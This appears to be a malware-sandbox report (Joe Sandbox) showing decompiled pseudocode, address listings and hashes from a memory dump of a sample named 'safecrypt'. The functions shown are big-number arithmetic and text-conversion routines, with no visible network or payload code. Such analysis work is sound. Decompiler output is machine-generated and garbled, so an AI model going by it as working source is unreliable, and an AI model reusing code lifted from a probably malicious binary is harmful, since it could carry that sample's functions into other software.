                    						E0040ECE0(_t296, _t296, _a8, _a12, _a16, 0, 0, _v20);
                    						asm("cdq");
                    						_t172 = _a16 - _t296 >> 1;
                    						_v36 = _t172;
                    						_t251 = _t344;
                    						__eflags = _t344 - _t332;
                    						if(_t344 <= _t332) {
                    							_t251 = _t332;
                    						}
                    						__eflags = _t251 - _t172;
                    						_t253 = _v24;
                    						if(__eflags != 0) {
                    							if(__eflags <= 0) {
                    								_t297 = _a4;
                    								_v16 = _t253 + _t297;
                    								E0042C770(_t253 + _t297, 0, _t253);
                    								__eflags = _t344 - 0x10;
                    								if(_t344 >= 0x10) {
                    									L21:
                    									asm("cdq");
                    									_t177 = _v36 - _t297 >> 1;
                    									__eflags = _t177 - _t344;
                    									if(_t177 < _t344) {
                    										L26:
                    										__eflags = _t344 - _t177;
                    										E0040F120(_v16, _v12, _v8, _t177, _t344 - _t177, _t332 - _t177, _v20);
                    									} else {
                    										while(1) {
                    											__eflags = _t177 - _t332;
                    											if(_t177 < _t332) {
                    												goto L26;
                    											}
                    											__eflags = _t177 - _t344;
                    											if(_t177 == _t344) {
                    												L30:
                    												E0040ECE0(_v8, _v16, _v12, _v8, _t177, _t344 - _t177, _t332 - _t177, _v20);
                    											} else {
                    												__eflags = _t177 - _t332;
                    												if(_t177 == _t332) {
                    													goto L30;
                    												} else {
                    													asm("cdq");
                    													_t177 = _t177 - _t297 >> 1;
                    													__eflags = _t177 - _t344;
                    													if(_t177 >= _t344) {
                    														continue;
                    													} else {
                    														goto L26;
                    													}
                    												}
                    											}
                    											goto L27;
                    										}
                    										goto L26;
                    									}
                    									goto L27;
                    								} else {
                    									__eflags = _t332 - 0x10;
                    									if(_t332 >= 0x10) {
                    										goto L21;
                    									} else {
                    										E0040F900(_t332, _v16, _v16, _v12, _t344, _v8);
                    									}
                    								}
                    							} else {
                    								_v16 = _t253 + _a4;
                    								E0040F120(_t253 + _a4, _v12, _v8, _t172, _t344 - _t172, _t332 - _t172, _v20);
                    								E0042C770(_a4 + (_a16 + _a16 + _t344 + _t332) * 8, 0, _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332);
                    							}
                    						} else {
                    							_v16 = _t253 + _a4;
                    							E0040ECE0(_v12, _t253 + _a4, _v12, _v8, _t172, _t344 - _t172, _t332 - _t172, _v20);
                    							E0042C770(_a4 + (_a16 + _a16 + _v36 * 2) * 8, 0, _v24 - (_v36 << 4));
                    						}
                    					} else {
                    						_v28 = _t237 + (_t248 + _t248) * 8;
                    						_t73 = _t237 + 0x40; // 0x40f831
                    						L00403870(_t73, _t237, _t237, _t332, _t344, __eflags, _t237 + (_t248 + _t248) * 8);
                    						L00403870(_a12, _t237, _a8, _t332, _t344, __eflags, _a4);
                    						_v16 = _a4 + (_a16 + _a16) * 8;
                    						E0040F900(_t332, _a12 + 0x40, _a4 + (_a16 + _a16) * 8, _a8 + 0x40, _t344, _a12 + 0x40);
                    						E0042C770(_a4 + (_a16 + _a16 + _t344 + _t332) * 8, 0, _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332 + _a16 + _a16 - _t344 - _t332);
                    						L27:
                    					}
                    					_t347 = _a16 + _a16;
                    					_t181 = E00403330(_t237, _a4, _v16, _t347);
                    					__eflags = _v32;
                    					_t334 = _t181;
                    					_t182 = _v28;
                    					_push(_t347);
                    					if(_v32 == 0) {
                    						_push(_t237);
                    						_push(_t182);
                    						_push(_t182);
                    						_t335 = _t334 + E00403330();
                    						__eflags = _t335;
                    					} else {
                    						_push(_t182);
                    						_push(_t237);
                    						_push(_t182);
                    						_t335 = _t334 - E004035D0();
                    					}
                    					_t300 = _a16;
                    					_t238 = _a4;
                    					_t185 = E00403330(_t238 + _t300 * 8, _t238 + _t300 * 8, _v28, _t347);
                    					_t336 = _t335 + _t185;
                    					__eflags = _t336;
                    					if(_t336 != 0) {
                    						_t185 = _t336;
                    						asm("cdq");
                    						_t257 = _t238 + (_t347 + _a16) * 8;
                    						_t339 = _t185 +  *_t257;
                    						_t350 = _t300;
                    						asm("adc esi, [ecx+0x4]");
                    						 *_t257 = _t339;
                    						_t257[1] = _t350;
                    						__eflags = _t350 - _t300;
                    						if(__eflags <= 0) {
                    							if(__eflags < 0) {
                    								L37:
                    								_t186 = _t257[2];
                    								_t301 = _t257[3];
                    								_t257 =  &(_t257[2]);
                    								_t187 = _t186 + 1;
                    								asm("adc edx, 0x0");
                    								 *_t257 = _t187;
                    								_t185 = _t187 | _t301;
                    								__eflags = _t185;
                    								_t257[1] = _t301;
                    							} else {
                    								__eflags = _t339 - _t185;
                    								if(_t339 < _t185) {
                    									do {
                    										goto L37;
                    									} while (_t185 == 0);
                    								}
                    							}
                    						}
                    					}
                    					return _t185;
                    				} else {
                    					return E0040F900(_a24 + _t241, _a4, _a4, _a8, _t241 + _a20, _a12);
                    				}
                    			}
















































                    0x0040f123
                    0x0040f126
                    0x0040f12f
                    0x0040f158
                    0x0040f15b
                    0x0040f163
                    0x0040f173
                    0x0040f17f
                    0x0040f186
                    0x0040f189
                    0x0040f19c
                    0x0040f1a3
                    0x0040f1ab
                    0x0040f1ae
                    0x0040f1ae
                    0x0040f1b2
                    0x0040f1b5
                    0x0040f1b8
                    0x0040f1be
                    0x00000000
                    0x0040f1d5
                    0x0040f1da
                    0x0040f1e0
                    0x0040f1e7
                    0x0040f1e8
                    0x0040f1e9
                    0x0040f1ec
                    0x0040f1ef
                    0x00000000
                    0x00000000
                    0x0040f1f5
                    0x0040f1fa
                    0x0040f1fe
                    0x0040f203
                    0x0040f205
                    0x0040f20a
                    0x0040f20d
                    0x0040f210
                    0x0040f219
                    0x0040f21c
                    0x0040f21f
                    0x0040f224
                    0x00000000
                    0x00000000
                    0x0040f22d
                    0x0040f230
                    0x0040f236
                    0x0040f239
                    0x0040f23b
                    0x0040f240
                    0x0040f243
                    0x0040f24f
                    0x0040f252
                    0x0040f256
                    0x0040f25b
                    0x00000000
                    0x00000000
                    0x0040f264
                    0x0040f267
                    0x0040f26b
                    0x0040f270
                    0x0040f272
                    0x0040f277
                    0x0040f27a
                    0x0040f27d
                    0x0040f283
                    0x0040f284
                    0x0040f285
                    0x0040f286
                    0x0040f289
                    0x0040f28c
                    0x0040f28c
                    0x0040f291
                    0x0040f291
                    0x00000000
                    0x00000000
                    0x0040f1be
                    0x0040f294
                    0x0040f294
                    0x0040f297
                    0x0040f29a
                    0x0040f312
                    0x0040f326
                    0x0040f329
                    0x0040f32f
                    0x0040f336
                    0x0040f339
                    0x0040f353
                    0x0040f359
                    0x0040f361
                    0x0040f364
                    0x0040f369
                    0x0040f36c
                    0x0040f36e
                    0x0040f370
                    0x0040f372
                    0x0040f372
                    0x0040f376
                    0x0040f378
                    0x0040f37b
                    0x0040f3cb
                    0x0040f41c
                    0x0040f426
                    0x0040f429
                    0x0040f431
                    0x0040f434
                    0x0040f454
                    0x0040f457
                    0x0040f45a
                    0x0040f45c
                    0x0040f45e
                    0x0040f475
                    0x0040f482
                    0x0040f48c
                    0x0040f460
                    0x0040f460
                    0x0040f460
                    0x0040f462
                    0x00000000
                    0x00000000
                    0x0040f464
                    0x0040f466
                    0x0040f4c6
                    0x0040f4dd
                    0x0040f468
                    0x0040f468
                    0x0040f46a
                    0x00000000
                    0x0040f46c
                    0x0040f46c
                    0x0040f46f
                    0x0040f471
                    0x0040f473
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040f473
                    0x0040f46a
                    0x00000000
                    0x0040f466
                    0x00000000
                    0x0040f460
                    0x00000000
                    0x0040f436
                    0x0040f436
                    0x0040f439
                    0x00000000
                    0x0040f43b
                    0x0040f44a
                    0x0040f44f
                    0x0040f439
                    0x0040f3cd
                    0x0040f3e8
                    0x0040f3eb
                    0x0040f412
                    0x0040f417
                    0x0040f37d
                    0x0040f394
                    0x0040f397
                    0x0040f3be
                    0x0040f3c3
                    0x0040f29c
                    0x0040f2a1
                    0x0040f2a5
                    0x0040f2aa
                    0x0040f2bc
                    0x0040f2de
                    0x0040f2e4
                    0x0040f308
                    0x0040f491
                    0x0040f491
                    0x0040f49d
                    0x0040f4a3
                    0x0040f4ab
                    0x0040f4af
                    0x0040f4b1
                    0x0040f4b4
                    0x0040f4b5
                    0x0040f4e4
                    0x0040f4e5
                    0x0040f4e6
                    0x0040f4ef
                    0x0040f4ef
                    0x0040f4b7
                    0x0040f4b7
                    0x0040f4b8
                    0x0040f4b9
                    0x0040f4c2
                    0x0040f4c2
                    0x0040f4f1
                    0x0040f4f7
                    0x0040f501
                    0x0040f509
                    0x0040f509
                    0x0040f50b
                    0x0040f510
                    0x0040f512
                    0x0040f513
                    0x0040f518
                    0x0040f51a
                    0x0040f51c
                    0x0040f51f
                    0x0040f521
                    0x0040f524
                    0x0040f526
                    0x0040f528
                    0x0040f530
                    0x0040f530
                    0x0040f533
                    0x0040f536
                    0x0040f539
                    0x0040f53c
                    0x0040f53f
                    0x0040f541
                    0x0040f541
                    0x0040f543
                    0x0040f52a
                    0x0040f52a
                    0x0040f52c
                    0x0040f530
                    0x00000000
                    0x00000000
                    0x0040f530
                    0x0040f52c
                    0x0040f528
                    0x0040f526
                    0x0040f54e
                    0x0040f131
                    0x0040f154
                    0x0040f154

                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a602f30de6607c77212270826deeafbb89ae01382e4b636a7c81bc4f03608c6e
                    • Instruction ID: 58cebf139317df1b6fde4ec56a5f34d25ad5054f39d3ae83fa109181bd26d976
                    • Opcode Fuzzy Hash: a602f30de6607c77212270826deeafbb89ae01382e4b636a7c81bc4f03608c6e
                    • Instruction Fuzzy Hash: 26E15DB5A00109AFDB14DF69CC81DAF77B9EF88304F14857DF809A7385E634AE158BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E0040ECE0(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed int _a20, signed int _a24, intOrPtr _a28) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				void* __ebx;
                    				signed int __edi;
                    				signed int __esi;
                    				void* __ebp;
                    				signed int _t157;
                    				signed int _t161;
                    				void* _t164;
                    				signed int _t165;
                    				signed int _t169;
                    				signed int _t174;
                    				signed int _t177;
                    				void* _t179;
                    				signed int _t181;
                    				signed int _t182;
                    				signed int _t183;
                    				void* _t222;
                    				signed int _t224;
                    				signed int _t228;
                    				signed int _t232;
                    				signed int _t233;
                    				signed int _t239;
                    				signed int* _t248;
                    				signed int _t262;
                    				intOrPtr _t266;
                    				signed int _t275;
                    				signed int _t276;
                    				signed int _t285;
                    				signed int _t286;
                    				intOrPtr _t290;
                    				signed int _t291;
                    				signed int _t292;
                    				signed int _t294;
                    				signed int _t297;
                    				signed int _t299;
                    				void* _t301;
                    				void* _t302;
                    
                    				_t233 = _a20;
                    				_t286 = _a16;
                    				asm("cdq");
                    				_t157 = _a24;
                    				_t297 = _t286 - __edx >> 1;
                    				_t266 = _t297 + _t157;
                    				_t222 = _t297 + _t233;
                    				_v32 = _t266;
                    				if(_t286 != 8) {
                    					__eflags = _t286 - 0x10;
                    					if(_t286 >= 0x10) {
                    						_v16 = _a8 + _t297 * 8;
                    						_v12 = _a12 + _t297 * 8;
                    						_v20 = 0;
                    						_v8 = 0;
                    						_v24 = _t297 - _t222;
                    						_v28 = _t266 - _t297;
                    						_t161 = E0040DCB0(_t297 - _t222, _t222, _a8, _v16);
                    						_t270 = _v12;
                    						_v36 = _t161 + _t161 * 2;
                    						_t164 = E0040DCB0(_t266 - _t297, _v32, _v12, _a12);
                    						_t290 = _a28;
                    						_t42 = _t164 + 4; // 0x40f342
                    						_t165 = _v36 + _t42;
                    						_t302 = _t301 + 0x10;
                    						__eflags = _t165 - 8;
                    						if(_t165 <= 8) {
                    							switch( *((intOrPtr*)(_t165 * 4 +  &M0040F0F8))) {
                    								case 0:
                    									E0040EA50(_v16, _t290, _a8, _t222, _t222 - _t297);
                    									_t313 = _t302 + 0xc;
                    									_t210 = _a24 + _t297;
                    									_t270 = _t297 - _t210;
                    									_push(_t297 - _t210);
                    									_push(_t210);
                    									_t211 = _a12;
                    									_push(_v12);
                    									goto L14;
                    								case 1:
                    									_v8 = 1;
                    									goto L16;
                    								case 2:
                    									__eax = _a8;
                    									__ebx = __ebx - __esi;
                    									__eax = _v16;
                    									__ecx = __edi;
                    									__eax = E0040EA50(_v16, __edi, _a8, __ebx, __ebx - __esi);
                    									__ecx = _v28;
                    									__edx = _a24;
                    									__esi + _a24 = _a12;
                    									__eax = _v12;
                    									__ecx = __edi + __esi * 8;
                    									__eax = E0040EA50(_v12, __ecx, _a12, __esi + _a24, _v28);
                    									_v20 = 1;
                    									goto L15;
                    								case 3:
                    									__ecx = _v24;
                    									__edx = _v16;
                    									__eax = _a8;
                    									__ecx = __edi;
                    									__eax = E0040EA50(_a8, __edi, _v16, __ebx, _v24);
                    									__edx = _a24;
                    									__eax = __esi + _a24;
                    									__esi = __esi - __esi + _a24;
                    									__eax = _v12;
                    									__eax = _a12;
                    									__ecx = __edi + __esi * 8;
                    									__eax = E0040EA50(_a12, __ecx, _v12, _a12, __esi - __esi + _a24);
                    									_v20 = 1;
                    									goto L15;
                    								case 4:
                    									__ecx = _v24;
                    									__edx = _v16;
                    									__eax = _a8;
                    									__ecx = __edi;
                    									E0040EA50(_a8, __edi, _v16, __ebx, _v24) = _v28;
                    									__ecx = _a24;
                    									__edx = _a12;
                    									_push(_v28);
                    									__eax = __esi + __ecx;
                    									_push(__esi + __ecx);
                    									__eax = _v12;
                    									_push(_a12);
                    									L14:
                    									E0040EA50(_t211, _t290 + _t297 * 8);
                    									L15:
                    									_t302 = _t313 + 0xc;
                    									goto L16;
                    							}
                    						}
                    						L16:
                    						__eflags = _t297 - 4;
                    						if(_t297 != 4) {
                    							__eflags = _t297 - 8;
                    							if(_t297 != 8) {
                    								goto L30;
                    							} else {
                    								__eflags = _a20;
                    								if(_a20 != 0) {
                    									goto L30;
                    								} else {
                    									__eflags = _a24;
                    									if(_a24 != 0) {
                    										goto L30;
                    									} else {
                    										_t228 = _a16 + _a16 + _a16 + _a16 + _a16 + _a16 + _a16 + _a16;
                    										__eflags = _v8;
                    										_v8 = _t228;
                    										if(__eflags != 0) {
                    											_t223 = _t228 + _t290;
                    											__eflags = _t228 + _t290;
                    											E0042C770(_t228 + _t290, 0, 0x80);
                    										} else {
                    											_t223 = _t228 + _t290;
                    											_t100 = _t290 + 0x40; // 0x40f37e
                    											L00403870(_t100, _t228 + _t290, _t290, _t290, _t297, __eflags, _t228 + _t290);
                    										}
                    										L00403870(_a12, _t223, _a8, _t290, _t297, __eflags, _a4);
                    										_v8 = _a4 + _v8;
                    										L00403870(_a12 + 0x40, _t223, _a8 + 0x40, _t290, _t297, __eflags, _a4 + _v8);
                    									}
                    								}
                    							}
                    						} else {
                    							__eflags = _a20;
                    							if(_a20 != 0) {
                    								L30:
                    								_t239 = _a16;
                    								_t168 = (_t239 << 4) + _t290;
                    								__eflags = _v8;
                    								_v28 = (_t239 << 4) + _t290;
                    								if(_v8 != 0) {
                    									_t169 = _t239 * 8;
                    									_t223 = _t169 + _t290;
                    									_v8 = _t169;
                    									E0042C770(_t169 + _t290, 0, _t169);
                    								} else {
                    									_t224 = _t239 * 8;
                    									_v8 = _t224;
                    									_t223 = _t224 + _t290;
                    									E0040ECE0(_t270, _t224 + _t290, _t290, _t290 + _t297 * 8, _t297, 0, 0, _t168);
                    								}
                    								E0040ECE0(_a12, _a4, _a8, _a12, _t297, 0, 0, _v28);
                    								_t174 = _a4 + _v8;
                    								__eflags = _t174;
                    								_v8 = _t174;
                    								E0040ECE0(_v12, _t174, _v16, _v12, _t297, _a20, _a24, _v28);
                    							} else {
                    								__eflags = _a24;
                    								if(_a24 != 0) {
                    									goto L30;
                    								} else {
                    									_t232 = _a16 + _a16 + _a16 + _a16 + _a16 + _a16 + _a16 + _a16;
                    									__eflags = _v8;
                    									_v8 = _t232;
                    									if(__eflags != 0) {
                    										_t223 = _t232 + _t290;
                    										__eflags = _t232 + _t290;
                    										E0042C770(_t232 + _t290, 0, 0x40);
                    									} else {
                    										_t223 = _t232 + _t290;
                    										_t86 = _t290 + 0x20; // 0x40f35e
                    										E00407AB0(_t86, _t290, __eflags, _t232 + _t290);
                    									}
                    									E00407AB0(_a12, _a8, __eflags, _a4);
                    									_v8 = _a4 + _v8;
                    									E00407AB0(_a12 + 0x20, _a8 + 0x20, __eflags, _a4 + _v8);
                    								}
                    							}
                    						}
                    						_t177 = E00403330(_t290, _a4, _v8, _a16);
                    						__eflags = _v20;
                    						_a24 = _t177;
                    						if(_v20 == 0) {
                    							_t179 = E00403330(_t223, _t223, _t290, _a16);
                    							_t139 =  &_a24;
                    							 *_t139 = _a24 + _t179;
                    							__eflags =  *_t139;
                    							_t291 = _a24;
                    						} else {
                    							_t291 = _a24 - E004035D0(_t223, _t290, _t223, _a16);
                    						}
                    						_t275 = _a16;
                    						_t181 = E00403330(_a4 + _t297 * 8, _a4 + _t297 * 8, _t223, _t275);
                    						_t292 = _t291 + _t181;
                    						__eflags = _t292;
                    						if(_t292 != 0) {
                    							_t248 = _a4 + (_t297 + _a16) * 8;
                    							_t299 = _t248[1];
                    							_t181 = _t292;
                    							asm("cdq");
                    							_t294 =  *_t248 + _t181;
                    							asm("adc esi, edx");
                    							 *_t248 = _t294;
                    							_t248[1] = _t299;
                    							__eflags = _t299 - _t275;
                    							if(__eflags <= 0) {
                    								if(__eflags < 0) {
                    									L41:
                    									_t182 = _t248[2];
                    									_t276 = _t248[3];
                    									_t248 =  &(_t248[2]);
                    									_t183 = _t182 + 1;
                    									asm("adc edx, 0x0");
                    									 *_t248 = _t183;
                    									_t181 = _t183 | _t276;
                    									__eflags = _t181;
                    									_t248[1] = _t276;
                    								} else {
                    									__eflags = _t294 - _t181;
                    									if(_t294 < _t181) {
                    										do {
                    											goto L41;
                    										} while (_t181 == 0);
                    									}
                    								}
                    							}
                    						}
                    						goto L42;
                    					} else {
                    						goto L5;
                    					}
                    				} else {
                    					if(_t233 != 0) {
                    						L5:
                    						_t300 = _a4;
                    						E0040F900(_t157 + _t286, _a8, _a4, _a8, _t233 + _t286, _a12);
                    						_t262 = _a20;
                    						_t285 = _a24;
                    						_t181 = _t262 + _t285;
                    						__eflags = _t181;
                    						if(_t181 >= 0) {
                    							L42:
                    							return _t181;
                    						} else {
                    							__eflags = _t262 + _t286 * 2 + _t285;
                    							return E0042C770(_t300 + (_t262 + _t286 * 2 + _t285) * 8, 0, _t181 * 0xfffffff8);
                    						}
                    					} else {
                    						_t319 = _t157;
                    						if(_t157 != 0) {
                    							goto L5;
                    						} else {
                    							return L00403870(_a12, _t222, _a8, _t286, _t297, _t319, _a4);
                    						}
                    					}
                    				}
                    			}















































                    0x0040ece6
                    0x0040ecec
                    0x0040ecf1
                    0x0040ecf6
                    0x0040ecf9
                    0x0040ecfb
                    0x0040ecfe
                    0x0040ed01
                    0x0040ed07
                    0x0040ed2a
                    0x0040ed2d
                    0x0040ed7d
                    0x0040ed8a
                    0x0040ed90
                    0x0040ed93
                    0x0040eda0
                    0x0040eda3
                    0x0040eda6
                    0x0040edae
                    0x0040edb8
                    0x0040edbe
                    0x0040edc6
                    0x0040edc9
                    0x0040edc9
                    0x0040edcd
                    0x0040edd0
                    0x0040edd3
                    0x0040edd9
                    0x00000000
                    0x0040edef
                    0x0040edfa
                    0x0040edfd
                    0x0040ee01
                    0x0040ee03
                    0x0040ee04
                    0x0040ee05
                    0x0040ee08
                    0x00000000
                    0x00000000
                    0x0040ee0e
                    0x00000000
                    0x00000000
                    0x0040ee1a
                    0x0040ee1f
                    0x0040ee24
                    0x0040ee27
                    0x0040ee29
                    0x0040ee2e
                    0x0040ee31
                    0x0040ee3c
                    0x0040ee40
                    0x0040ee43
                    0x0040ee46
                    0x0040ee4b
                    0x00000000
                    0x00000000
                    0x0040ee54
                    0x0040ee57
                    0x0040ee5a
                    0x0040ee60
                    0x0040ee62
                    0x0040ee67
                    0x0040ee6a
                    0x0040ee72
                    0x0040ee76
                    0x0040ee7a
                    0x0040ee7d
                    0x0040ee80
                    0x0040ee85
                    0x00000000
                    0x00000000
                    0x0040ee8e
                    0x0040ee91
                    0x0040ee94
                    0x0040ee9a
                    0x0040eea1
                    0x0040eea4
                    0x0040eea7
                    0x0040eead
                    0x0040eeae
                    0x0040eeb1
                    0x0040eeb2
                    0x0040eeb5
                    0x0040eeb6
                    0x0040eeb9
                    0x0040eebe
                    0x0040eebe
                    0x00000000
                    0x00000000
                    0x0040edd9
                    0x0040eec1
                    0x0040eec1
                    0x0040eec4
                    0x0040ef42
                    0x0040ef45
                    0x00000000
                    0x0040ef47
                    0x0040ef47
                    0x0040ef4b
                    0x00000000
                    0x0040ef4d
                    0x0040ef4d
                    0x0040ef51
                    0x00000000
                    0x0040ef53
                    0x0040ef5a
                    0x0040ef5c
                    0x0040ef60
                    0x0040ef63
                    0x0040ef7c
                    0x0040ef7c
                    0x0040ef81
                    0x0040ef65
                    0x0040ef65
                    0x0040ef67
                    0x0040ef6d
                    0x0040ef72
                    0x0040ef93
                    0x0040efae
                    0x0040efb1
                    0x0040efb6
                    0x0040ef51
                    0x0040ef4b
                    0x0040eec6
                    0x0040eec6
                    0x0040eeca
                    0x0040efbe
                    0x0040efbe
                    0x0040efc6
                    0x0040efc8
                    0x0040efcc
                    0x0040efcf
                    0x0040eff3
                    0x0040effb
                    0x0040f001
                    0x0040f004
                    0x0040efd1
                    0x0040efd7
                    0x0040efe2
                    0x0040efe5
                    0x0040efe9
                    0x0040efee
                    0x0040f021
                    0x0040f02f
                    0x0040f02f
                    0x0040f045
                    0x0040f048
                    0x0040eed0
                    0x0040eed0
                    0x0040eed4
                    0x00000000
                    0x0040eeda
                    0x0040eee1
                    0x0040eee3
                    0x0040eee7
                    0x0040eeea
                    0x0040ef00
                    0x0040ef00
                    0x0040ef05
                    0x0040eeec
                    0x0040eeec
                    0x0040eeee
                    0x0040eef4
                    0x0040eef9
                    0x0040ef17
                    0x0040ef32
                    0x0040ef35
                    0x0040ef3a
                    0x0040eed4
                    0x0040eeca
                    0x0040f05d
                    0x0040f065
                    0x0040f069
                    0x0040f06c
                    0x0040f08b
                    0x0040f093
                    0x0040f093
                    0x0040f093
                    0x0040f096
                    0x0040f06e
                    0x0040f080
                    0x0040f080
                    0x0040f099
                    0x0040f0a6
                    0x0040f0ae
                    0x0040f0ae
                    0x0040f0b0
                    0x0040f0b8
                    0x0040f0bb
                    0x0040f0be
                    0x0040f0c2
                    0x0040f0c3
                    0x0040f0c5
                    0x0040f0c7
                    0x0040f0c9
                    0x0040f0cc
                    0x0040f0ce
                    0x0040f0d0
                    0x0040f0d6
                    0x0040f0d6
                    0x0040f0d9
                    0x0040f0dc
                    0x0040f0df
                    0x0040f0e2
                    0x0040f0e5
                    0x0040f0e7
                    0x0040f0e7
                    0x0040f0e9
                    0x0040f0d2
                    0x0040f0d2
                    0x0040f0d4
                    0x0040f0d6
                    0x00000000
                    0x00000000
                    0x0040f0d6
                    0x0040f0d4
                    0x0040f0d0
                    0x0040f0ce
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040ed09
                    0x0040ed0b
                    0x0040ed2f
                    0x0040ed32
                    0x0040ed40
                    0x0040ed45
                    0x0040ed48
                    0x0040ed4b
                    0x0040ed51
                    0x0040ed53
                    0x0040f0f4
                    0x0040f0f4
                    0x0040ed59
                    0x0040ed60
                    0x0040ed76
                    0x0040ed76
                    0x0040ed0d
                    0x0040ed0d
                    0x0040ed0f
                    0x00000000
                    0x0040ed11
                    0x0040ed29
                    0x0040ed29
                    0x0040ed0f
                    0x0040ed0b

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID:
                    • API String ID: 2102423945-0
                    • Opcode ID: 057eb5bc42fc12bac5a74c85d435e80052a16c3e30746c0e74256393d5dd3c59
                    • Instruction ID: 6539336be00eb58aaa4580814aa386b459e0d20e3f44f275eda09596c87c6cf7
                    • Opcode Fuzzy Hash: 057eb5bc42fc12bac5a74c85d435e80052a16c3e30746c0e74256393d5dd3c59
                    • Instruction Fuzzy Hash: CFE183B5A00109ABDB10DF59DC81EAF77B9EF88304F14853AF805A7381E635EE15CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0042D64A(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                    				char _v8;
                    				signed int _v12;
                    				char _v20;
                    				char _t43;
                    				char _t46;
                    				signed int _t53;
                    				signed int _t54;
                    				intOrPtr _t56;
                    				int _t57;
                    				int _t58;
                    				char _t59;
                    				short* _t60;
                    				int _t65;
                    				char* _t73;
                    
                    				_t73 = _a8;
                    				if(_t73 == 0 || _a12 == 0) {
                    					L5:
                    					return 0;
                    				} else {
                    					if( *_t73 != 0) {
                    						E00425EF9( &_v20, __edi, _a16);
                    						_t43 = _v20;
                    						__eflags =  *(_t43 + 0x14);
                    						if( *(_t43 + 0x14) != 0) {
                    							_t46 = E0042CAED( *_t73 & 0x000000ff,  &_v20);
                    							__eflags = _t46;
                    							if(_t46 == 0) {
                    								__eflags = _a4;
                    								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                    								if(__eflags != 0) {
                    									L10:
                    									__eflags = _v8;
                    									if(_v8 != 0) {
                    										_t53 = _v12;
                    										_t11 = _t53 + 0x70;
                    										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                    										__eflags =  *_t11;
                    									}
                    									return 1;
                    								}
                    								L21:
                    								_t54 = E00426D35(__eflags);
                    								 *_t54 = 0x2a;
                    								__eflags = _v8;
                    								if(_v8 != 0) {
                    									_t54 = _v12;
                    									_t33 = _t54 + 0x70;
                    									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                    									__eflags =  *_t33;
                    								}
                    								return _t54 | 0xffffffff;
                    							}
                    							_t56 = _v20;
                    							_t65 =  *(_t56 + 0xac);
                    							__eflags = _t65 - 1;
                    							if(_t65 <= 1) {
                    								L17:
                    								__eflags = _a12 -  *(_t56 + 0xac);
                    								if(__eflags < 0) {
                    									goto L21;
                    								}
                    								__eflags = _t73[1];
                    								if(__eflags == 0) {
                    									goto L21;
                    								}
                    								L19:
                    								_t57 =  *(_t56 + 0xac);
                    								__eflags = _v8;
                    								if(_v8 == 0) {
                    									return _t57;
                    								}
                    								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                    								return _t57;
                    							}
                    							__eflags = _a12 - _t65;
                    							if(_a12 < _t65) {
                    								goto L17;
                    							}
                    							__eflags = _a4;
                    							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                    							__eflags = _t58;
                    							_t56 = _v20;
                    							if(_t58 != 0) {
                    								goto L19;
                    							}
                    							goto L17;
                    						}
                    						_t59 = _a4;
                    						__eflags = _t59;
                    						if(_t59 != 0) {
                    							 *_t59 =  *_t73 & 0x000000ff;
                    						}
                    						goto L10;
                    					} else {
                    						_t60 = _a4;
                    						if(_t60 != 0) {
                    							 *_t60 = 0;
                    						}
                    						goto L5;
                    					}
                    				}
                    			}

















                    0x0042d654
                    0x0042d65b
                    0x0042d672
                    0x00000000
                    0x0042d662
                    0x0042d664
                    0x0042d67e
                    0x0042d683
                    0x0042d686
                    0x0042d689
                    0x0042d6b1
                    0x0042d6b8
                    0x0042d6ba
                    0x0042d73b
                    0x0042d756
                    0x0042d758
                    0x0042d698
                    0x0042d698
                    0x0042d69b
                    0x0042d69d
                    0x0042d6a0
                    0x0042d6a0
                    0x0042d6a0
                    0x0042d6a0
                    0x00000000
                    0x0042d6a6
                    0x0042d71a
                    0x0042d71a
                    0x0042d71f
                    0x0042d725
                    0x0042d728
                    0x0042d72a
                    0x0042d72d
                    0x0042d72d
                    0x0042d72d
                    0x0042d72d
                    0x00000000
                    0x0042d731
                    0x0042d6bc
                    0x0042d6bf
                    0x0042d6c5
                    0x0042d6c8
                    0x0042d6ef
                    0x0042d6f2
                    0x0042d6f8
                    0x00000000
                    0x00000000
                    0x0042d6fa
                    0x0042d6fd
                    0x00000000
                    0x00000000
                    0x0042d6ff
                    0x0042d6ff
                    0x0042d705
                    0x0042d708
                    0x0042d677
                    0x0042d677
                    0x0042d711
                    0x00000000
